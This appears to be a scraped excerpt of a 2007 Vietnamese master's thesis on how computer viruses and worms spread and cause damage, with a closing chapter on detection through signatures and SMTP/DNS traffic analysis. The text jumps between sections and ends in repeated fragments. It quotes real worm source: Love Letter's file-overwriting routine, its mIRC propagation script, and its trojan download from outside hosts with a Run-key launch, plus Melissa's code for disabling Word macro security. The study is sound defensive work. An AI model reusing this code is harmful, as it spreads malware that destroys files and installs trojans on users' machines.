BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC BÁCH KHOA HÀ NỘI - LUẬN VĂN THẠC SĨ KHOA HỌC CÁC PHƯƠNG PHÁP LÂY LAN VÀ PHÁ HOẠI CỦA VIRUS MÁY TÍNH TRẦN HẢI NAM HÀ NỘI 2007 MỤC LỤC Mục lục Danh mục hình vẽ, đồ thị Các từ viết tắt Lời cảm ơn Lời nói đầu Chương Giới thiệu chung 1.1 Các khái niệm 1.1.1 Phân loại phần mềm độc hại 1.1.2 Cấu trúc chung virus 1.1.3 Cách thức phá hoại 11 1.2 Lịch sử hình thành phát triển virus máy tính 12 1.2.1 Giai đoạn thứ (1979 – 1989) 12 1.2.2 Giai đoạn thứ hai (1990 – 1998) 13 1.2.3 Giai đoạn thứ ba (1999 – 2000) 14 1.2.4 Giai đoạn thứ tư (2000 - ) 16 1.3 Các xu hướng phát triển 17 Chương Nguyên lý hoạt động kỹ thuật đặc trưng 19 2.1 Boot virus 19 2.1.1 Cấu trúc chương trình 20 2.1.2 Các kỹ thuật 23 2.2 File virus 27 2.2.1 Cấu trúc chương trình 27 2.2.2 Các kỹ thuật 30 2.3 Virus Windows 37 2.3.1 Nguyên lý hoạt động 37 2.3.2 Các kỹ thuật 38 2.4 Macro virus 41 2.4.1 Cấu trúc chương trình 41 2.4.2 Các kỹ thuật 42 2.5 Worm 50 2.5.1 Nguyên lý hoạt động 51 2.5.2 Các kỹ thuật 58 Chương Một số kỹ thuật phòng chống 69 3.1 Các phần mềm diệt virus truyền thống 69 3.2 Phân tích lưu lượng 70 3.3 Kết luận 76 Tài liệu tham khảo 79 DANH MỤC HÌNH VẼ, ĐỒ THỊ Hình 2.1 Phần cài đặt boot virus Hình 2.2 Phần thân boot virus Hình 2.3 Phần lây lan file virus Hình 2.4 Phần cài đặt file virus Hình 2.5 Quá trình lây lan vào file normal.dot Hình 2.6 Quá trình lây lan vào file văn Hình 2.7 Nguyên lý hoạt động worm Melissa Hình 2.8 Nguyên lý hoạt động worm Love Letter Hình 2.9 Nguyên lý hoạt động worm Code Red Hình 3.1 Luồng TCP host bị nhiễm Hình 3.2 Luồng TCP host bình thường Hình 3.3 Luồng SMTP mail server Hình 3.4 Distinct IP host bị nhiễm Hình 3.5 Distinct IP host bình thường CÁC TỪ VIẾT TẮT Tiếng Anh Tiếng Việt A API Application Programming Interface Giao diện lập trình ứng dụng B BPB Bios Parameter Block Bảng tham số đĩa DNS Domain Name Server Máy chủ tên miền DoS Denial of Services Từ chối dịch vụ Memory Control Block Cấu trúc đầu D M MCB khối nhớ R ROM Read Only Memory Bộ nhớ đọc RAM Random Access Memory Bộ nhớ truy cập nhẫu nhiên P POST Power On Self Test Tự kiểm tra khởi động PSP Program Segment Prefix Đoạn mào đầu chương trình LỜI CẢM ƠN Tôi xin chân thành cảm ơn thầy cô giáo khoa Công nghệ thông tin, khoa Điện tử viễn thông - Trường Đại học Bách Khoa Hà nội, người trực tiếp giảng dạy, truyền đạt cho kiến thức chuyên môn phương pháp làm việc khoa học Đặc biệt, xin chân thành cảm ơn PGS.TS Nguyễn Quốc Trung, tận tình hướng dẫn cung cấp tài liệu để tơi hồn thành luận văn Tôi xin gửi lời biết ơn sâu sắc tới gia đình, đồng nghiệp bè bạn nâng đỡ sống công việc Hà Nội, ngày 09 tháng 10 năm 2007 Học viên Trần hải Nam LỜI NÓI ĐẦU Virus máy tính, từ đời trở thành, trở thành mối nguy hại tất hệ thống máy tính mạng giới Đặc biệt, Việt Nam, phát triển hệ virus máy tính năm gần gây hậu mà để khắc phục chúng phải tiêu phí lượng lớn thời gian tiền bạc Mặt khác, phủ nhận tính tích cực virus máy tính, virus máy tính phát triển dựa sơ xuất công nghệ người sử dụng nên thơng qua việc tìm hiểu chế hoạt động virus, phương thức lây lan phá hoại đưa giải pháp cải thiện chất lượng độ an toàn phần mềm hệ thống Thế nhưng, có thực tế Việt Nam, tài liệu nghiên cứu virus máy tính vơ ỏi thiếu chi tiết, dẫn đến hậu người sử dụng máy tính thường khơng có đủ kiến thức cần thiết để tự bảo vệ máy tính liệu trước cơng virus máy tính Xuất phát từ yếu tố trên, luận văn lựa chọn đề tài: “Các phương pháp lây lan phá hoại virus máy tính” Luận văn chia làm chương, với nội dung chương sau: - Chương 1: Giới thiệu lịch sử hình thành phát triển virus máy tính qua thời kỳ từ đưa nhận định phát triển virus tương lai gần Các khái niệm định nghĩa virus máy tính nói riêng phần mềm độc hại nói chung - Chương 2: Tìm hiểu sở lý thuyết giúp xây dựng nên virus máy tính, phương thức lây lan phá hoại virus máy tính gắn với giai đoạn phát triển - Chương 3: Giới thiệu kỹ thuật phát virus kiến nghị nghiên cứu CHƯƠNG GIỚI THIỆU CHUNG Virus máy tính từ đời tận dụng kỹ thuật tiên tiến công nghệ thông tin truyền thông lợi dụng lổ hổng nguy hiểm hệ thống tin học để khuyếch trương ảnh hưởng Mặc dù việc sử dụng thiết bị phần mềm bảo mật trở nên phổ biến, virus tiếp tục phát triển mạnh mẽ chúng thường viết có mục đích rõ ràng, phục vụ đối tượng cụ thể không ngừng cải tiến qua phiên để đạt phiên hiệu 1.1 Các khái niệm 1.1.1 Phân loại phần mềm độc hại Có nhiều cách phân loại phần mềm độc hại định nghĩa chúng có đơi chút khác nhau, xin trình bày cách phân loại đơn giản sử dụng thống toàn luận văn • Bugware: Các chương trình phần mềm hợp lệ thiết kế để thực số chức lỗi lập trình nên gây lỗi cho hệ thống sử dụng • Trojan horse: Các đoạn chương trình có hại cài có chủ định vào chương trình hợp lệ, tiến hành phá hoại, ăn cắp thơng tin người sử dụng v.v khơng có khả lây lan • Software bombs: Các đoạn mã có tính chất phá hoại giấu bí mật chờ thực hiện, phá hoại lần, không lây lan o Logic bombs: Chương trình chứa đoạn lệnh phá hoại, việc có phá hoại hay không phụ thuộc vào trạng thái hệ thống o Time bombs: Việc có phá hoại hay không phụ thuộc vào thời gian hệ thống • Replicators: Các chương trình gần giống với virus, liên tục nhân làm cạn kiệt tài nguyên hệ thống khiến chương trình khác khơng hoạt động • Virus: Chương trình máy tính thiết kế để tự lây lan từ file tới file khác máy vi tính riêng lẻ, khơng có khả tự lây lan từ máy tính sang máy tính khác (trong hầu hết trường hợp việc lây lan người) • Worm: Chương trình thiết kế để tự lây lan từ máy tính tới máy tính khác qua mạng 1.1.2 Cấu trúc chung virus Thông thường, cấu trúc virus bao gồm phần • Phần lây lan (infection): Cách cách virus dùng để lây lan Chức tìm kiếm đối tượng phù hợp, việc tìm kiếm tích cực trường hợp virus lây file tìm kiếm file có kích thước định dạng phù hợp để lây nhiễm, việc tìm kiếm bị động trường hợp virus macro Khi tìm thấy đối tượng thích hợp lại có số vấn đề đặt ra, vài virus cố gắng làm chậm việc lây lan lại cách lây cho file lần để tránh việc bị phát người sử dụng, có vài virus lại chọn chế lây nhiễm nhanh, hay nói cách khác lây nhanh tốt, nhiều tốt, tất virus phải kiểm tra xem đối tượng bị lây nhiễm chưa (vì lây nhiễm nhiều lần lên đối tượng dễ bị phát hiện), ta minh họa đoạn giả mã sau: BEGIN IF (tìm thấy đối tượng thích hợp) AND (đối tượng chưa bị lây nhiễm) 65 sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") 66 mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eqfolderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script mIRC will corrupt,if mIRC will"scriptini.WriteLine " corrupt WINDOWS will affect and will not run correctly thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub Trong Melissa lại phá hoại cách chèn đoạn text vào văn người sử dụng điều kiện kích hoạt xảy 67 Đoạn mã sau trích từ source code worm Melissa để minh họa kỹ thuật kiểm tra điều kiện kích hoạt If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters Game's over I'm outta here." Hạ mức bảo mật Word Đoạn mã sau trích từ source code worm Melissa để minh họa kỹ thuật hạ mức bảo mật macro Microsoft Word IfSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Micr osoft\Office\9.0\Word\Security", "Level") "" Then CommandBars("Macro").Controls("Security ").Enabled = False System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Micros oft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Download trojan Đoạn mã sau trích từ source code worm Lover Letter để minh họa kỹ thuật tự động download Trojan máy tính người sử dụng Randomize num = Int((4 * Rnd) + 1) if num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\Start 68 Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetr dsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyq werWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEk bopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = then regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage","http ://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjk hYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7t hjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curre ntVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank" end if Điều đáng ý worm tự sinh giá trị ngẫu nhiên đặt vào IE homepage để download trojan từ bốn địa máy người sử dụng, sau tạo key cho phép trojan chạy máy tính khởi động Cuối worm xóa IE homepage thành blank để xóa dấu vết 69 CHƯƠNG MỘT SỐ KỸ THUẬT PHÒNG CHỐNG 3.1 Các phần mềm diệt virus truyền thống Trong năm gần đây, sau hứng chịu hậu nặng nề từ công worm Melissa, Love Letter, Code Red, SoBig, MyDoom v.v nhiều người sử dụng kinh ngạc tự hỏi phần mềm diệt virus mà họ sử dụng lại không ngăn chặn worm từ lúc chúng bắt đầu lây nhiễm vào máy họ làm để phần mềm diệt virus bảo vệ liệu họ tương lai Các chương trình chống virus truyền thống thường sử dụng hệ thống phát dựa việc đối sánh sánh mẫu (pattern matching) phương pháp quét (scanner) Những hệ thống trích rút đoạn mã từ virus biết, nhập chúng vào sở liệu, so sánh file cần kiểm tra với sở liệu để kết luận file có virus hay khơng Nói chung, hệ thống kiểu thường có nhược điểm sau: • Hệ thống khơng thể phát unknown virus mà mẫu (đặc trưng) chúng không chứa sở liệu • Rất khó để trích rút mẫu đặc trưng cho virus ngăn ngừa việc file bị nhận dạng nhầm virus • Những mẫu sở liệu sử dụng để đối sánh mẫu virus có nhiều biến thể khác Để cải tiến, chương trình chóng virus bổ sung thêm chế so sánh cấu trúc chương trình bên cạnh việc so sánh mẫu Tuy nhiên kiểu so sánh dựa vào thông tin chất câu lệnh bị giới hạn với virus có biện pháp đề phịng từ trước 70 Do phát triển đáng sợ virus thời gian vừa qua mà công cụ diệt virus truyền thống thường khơng có khả phát ngăn chặn chúng Từ đặt yêu cầu cần phải có cơng nghệ phát xác hơn, thơng minh để ngăn chặn phá hoại virus chúng vừa xuất Một số phương pháp phát virus dựa hành vi đặc trưng chúng lây nhiễm vào file hay gửi email phát tán thông qua việc phân tích hàm API Q trình phân tích bao gồm việc giải mã sử dụng kỹ thuật code simulation phân tích static code Code simulation: kỹ thuật mơ xác thay đổi cấu trúc bên kiến trúc vi xử lý x86 bao gồm ghi, nhớ, cờ v.v ) thực câu lệnh Static code analysis: Phân tích câu lệnh để tìm kiếm lời gọi hàm khả nghi hệ điều hành Windows có chế bảo vệ file tài nguyên khác khỏi thao tác trực tiếp từ chương trình bình thường Ngay virus phải gọi hàm từ hệ điều hành để thực hành động gây hại Từ việc nghiên cứu hoạt động virus ta rút tập hợp hàm có khả liên quan đến hành vi chúng Hai kỹ thuật sử dụng bổ trợ cho nhau, ví dụ trường hợp gặp unknow virus có mã hóa kỹ thuật code simulation thực trước để giải mã virus sau thực việc phân tích static code 3.2 Phân tích lưu lượng Worm phát tán qua email vừa chiếm dụng tài nguyên mạng vừa sử dụng phương tiện để thực công từ chối dịch vụ phân tán (Distributed Deny Of Service attack – DDoS) Trong thời gian gần đợt bùng phát worm công lây lan qua email ngày tăng, phần người sử dụng thường không cập nhật nâng cấp phần mềm diệt virus, phần yếu phần mềm việc 71 phát unknown virus việc lọc không hiệu mail server Phần tập trung vào việc tìm hiểu hành vi đặc trưng dòng worm phát tán qua email thông qua việc nghiên cứu hai worm cụ thể SoBig MyDoom, đặc biệt việc phát tán làm thay đổi thơng số lưu lượng mạng, từ dẫn tới cách tiếp cận để tự động phát tiêu diệt chúng Không virus email truyền thống, worm phát tán email không giới hạn số mục tiêu chúng hoàn toàn sổ địa nạn nhân Những worm SoBig hay MyDoom biết tận dụng kỹ thuật lây lan tìm kiếm domain name từ máy nạn nhân (bằng cách quét web caches ổ đĩa cứng) sau cố gắng xây dựng địa để chúng tiến hành gửi email phát tán Việc thống kê lưu lượng thực edge route tổ chức cụ thể Lưu lượng thống kê hai giai đoạn thời gian đặc biệt Giai đoạn đầu từ ngày tháng năm 2003 đến ngày tháng năm 2003 giai đoạn có lây lan worm SoBig, đặc biệt cao điểm vào ngày 16 tháng năm 2003 Giai đoạn thứ hai từ ngày 15 tháng năm 2004 đến ngày tháng năm 2004 giai đoạn có lây lan worm MyDoom, đặc biệt cao điểm vào ngày 24 tháng năm 2004 Thực việc cơng hai worm cịn kéo dài suốt tháng giai đoạn tác động chúng lên việc thay đổi lưu lượng không đạt hai tuần Việc phân tích thực cách nghiên cứu mẫu lưu lượng, cụ thể thay đổi tỷ lệ lưu lượng TCP, SMTP, DNS trước đợt bùng phát worm Nếu host thay đổi hành vi cách thiết lập số lượng lớn kết nối SMTP suốt đợt bùng phát worm, dánh dấu bị lây nhiễm, sau phải sử dụng thuật tốn khác để đánh giá việc lây nhiễm có thật hay khơng 72 Phân tích mẫu lưu lượng TCP: Hình 3.1 biểu thị lưu lượng trung bình luồng TCP (cả thành công lỗi) host bị nhiễm worm, ta thấy, trước đợt bùng phát (ngày 0-12), host tạo kết nối SMTP Đợt bùng phát hai worm SoBig MyDoom (xung quanh ngày 1215) tạo số lượng luồng SMTP (gần 50% tổng số luồng TCP), đặc biệt với worm SoBig, ta nhận thấy dấu hiệu tăng với số lượng lớn luồng TCP việc worm có thủ tục định kỳ kết nối tới server để tải đoạn mã độc Hình 3.1 Luồng TCP host bị nhiễm Ngồi ra, hai worm có số lượng tương đối lớn kết nối SMTP lỗi, trường hợp worm SoBig 25% tổng số luồng TCP 73 với worm MyDoom 40%, điều kết việc worm MyDoom cố gắng xây dựng tên mail server domain riêng biệt Ngược lại với thay đổi luồng TCP host bị nhiễm worm, hình 3.2 ta thấy lưu lượng TCP trung bình host bình thường ghi lại khoảng thời gian tương tự Ta nhận thấy host không bị nhiễm worm lưu lượng có dạng tuần hồn theo chu kỳ tuần hàng tuần (lưu lượng cao ngày thường giảm thấp ngày nghỉ cuối tuần), nữa, host không bị nhiễm worm cố gắng tạo kết nối tới SMTP server bên ngoài, ta thấy hình có luồng SMTP Hình 3.2 Luồng TCP host bình thường Hình 3.3 cho biểu diễn tất luồng lưu lượng SMTP mail server 74 Hình 3.3 Luồng SMTP mail server Từ việc thống kê luồng TCP, nhận thấy worm Sobig sử dụng nhiều chiến lược để lây lan worm MyDoom, trường hợp số máy tính bị nhiễm worm Sobig số máy tính bị nhiễm worm MyDoom tổng số luồng sinh máy nhiễm worm Sobig lớn 50% so với tổng số luồng sinh máy nhiễm worm MyDoom Ngoài ta nhận thấy dựa vào việc mail server khơng có hiệu để phát worm MyDoom, mà lưu lượng mail server suốt đợt bùng phát MyDoom không xuất điều bất thường nhiều Distinct Ips: Vì việc phân tích lưu lượng mẫu TCP chưa đủ nên ta phải kết hợp với việc khảo sát thêm số liệu số lượng địa IP riêng biệt cho luồng TCP 75 Hình 3.4 cho thấy số lượng trung bình địa IP đích riêng biệt cho luồng TCP host bị bị lây nhiễm So sánh số lượng trung bình luồng TCP thành cơng hình số lượng trung bình địa IP riêng biệt hình ta nhận thấy worm Sobig thời điểm búng phát mạnh mẽ có trung bình 2000 luồng SMTP tương ứng với 200 địa IP riêng biệt Hình 3.4 Distinct IP host bị nhiễm Hình 3.5 thể số trung bình địa IP riêng biệt host bình thường 76 Hình 3.5 Distinct IP host bình thường DNS Traffic: Do worm lây nhiễm vào mục tiêu cách sử dụng danh sách địa email, để thực việc SMTP engine worm phải tiếp xúc với DNS server để lấy địa IP mail server đích, chắn có số lượng lớn DNS query tạo suốt đợt bùng phát worm 3.3 Kết luận Bất chấp firewall, hệ thống dị tìm thiết bị bảo mật mạng khác, worm tiếp tục lây lan với tốc độ ngày nhanh Việc phát triển mạnh mẽ worm làm công ty tổ chức phải xem việc phòng chống 77 chúng phần q trình điều hành với chi phí ngày gia tăng Tuy nhiên việc phòng chống virus nói riêng phần mềm độc hại nói chung phút chưa đạt hiệu mong muốn số lý sau: • Các phần mềm viết ngày có nhiều tính năng, ngày phức tạp hệ tất yếu ngày có nhiều lỗi , virus worm tiếp tục phát triển chừng hệ thống máy tính cịn có lỗi • Khi lỗi phát cung cấp vá (patch) nhiều người sử dụng, chí người điều hành khơng hình dung tầm quan trọng chúng chậm trễ việc vá lỗi hệ thống họ tạo điều kiện cho virus lưu trú lây lan sang hệ thống khác • Một lý việc thiếu trách nhiệm xã hội người viết virus Việc lần theo dấu vết virus từ việc phân tích mã lệnh để tìm người viết chúng khó khăn, trừ tác giả vơ tình hay cố ý để lộ dấu vết mã nguồn, chí người viết virus bị nhận dạng bị bắt giữ, khó để khởi tố hệ thống luật pháp vấn đề tội phạm máy tính nhiều quốc gia chưa hồn thiện Do đó, lời tun án nhẹ nhàng Ví dụ: Robert Morirs, tác giả worm Morris năm 1988 nhận án năm tù treo 400 lao động cơng ích 10.000$ tiền phạt Chen Ing-hau bị bắt giữ Đài loan viết virus Chernobyl sau trả tự khơng có khiếu nại từ phía quyền Onel de Guzman bị bắt tội viết virus Love Letter năm 2000 làm triệu máy tính bị hư hỏng tha Philippin thiếu điều luật xử phạt tội trạng Jan de Wit bị tuyên án 150 lao động cơng ích viết virus Anna Kournikova David L.Smith viết virus 78 Mellisa năm 1999 làm triệu máy tính bị hư hại bị tuyên án 20 tháng tù 7500 $ tiền phạt 79 Tài liệu tham khảo Nguyễn Xuân Hoài (1999), Tập giảng mơn học virus máy tính, Học Viện Kỹ Thuật Quân Sự Nguyễn Lê Tín (1997), Hỗ trợ kỹ thuật cho lập trình hệ thống, NXB Đà Nẵng Ngô Anh Vũ (2002), Virus tin học huyền thoại thực tế, NXB Thành Phố Hồ Chí Minh Anand Mylavarapu, Anil Chukkapalli, Source code analysis and performance, Computer Science Department, St Cloud State University Cynthia Wong, Stan Bielski, Jonathan M McCune, Chenxi Wang, A Study of Mass-mailing Worms, Carnegie Mellon University David Harley, Robert Slade, Urs Gattiker (2001), Viruses Revealed, McGraw Hill http://www.wikipedia.org http://vx.netlux.org ... phủ nhận tính tích cực virus máy tính, virus máy tính phát triển dựa sơ xuất công nghệ người sử dụng nên thơng qua việc tìm hiểu chế hoạt động virus, phương thức lây lan phá hoại đưa giải pháp cải... chọn đề tài: ? ?Các phương pháp lây lan phá hoại virus máy tính? ?? Luận văn chia làm chương, với nội dung chương sau: - Chương 1: Giới thiệu lịch sử hình thành phát triển virus máy tính qua thời... • Virus: Chương trình máy tính thiết kế để tự lây lan từ file tới file khác máy vi tính riêng lẻ, khơng có khả tự lây lan từ máy tính sang máy tính khác (trong hầu hết trường hợp việc lây lan